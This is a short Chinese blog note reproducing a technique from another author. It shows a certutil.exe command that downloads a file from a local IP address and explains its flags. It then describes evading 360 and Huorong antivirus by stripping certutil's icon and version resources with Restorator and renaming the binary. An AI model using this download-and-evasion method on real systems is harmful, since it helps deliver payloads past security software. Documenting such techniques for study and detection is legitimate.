今天看了crow师傅的文章,自己复现学习了一下。
certutil.exe -urlcache -split -f http://192.168.1.101:8876/1.txt
- -urlcache:显示或删除url缓存条目。certutil.exe下载有弊端,每次下载都有缓存。
- -split:保存到文件。加此参数可下载到当前路径,不加就下载到默认路径。
- -f:覆盖现有文件,后面要跟下载的文件。
正常使用certutil.exe下载文件会被360拦:
把certutil.exe用Restorator打开,删掉其图标和版本信息:
另外,把certutil.exe重新命名,就可以成功下载了捏^^。
火绒的话,正常输入命令同样被拦截:
经测试,多加空格、多家多余参数等方法均失效。还得刚才利用Restorator编辑其资源的方法才能对其绕过。
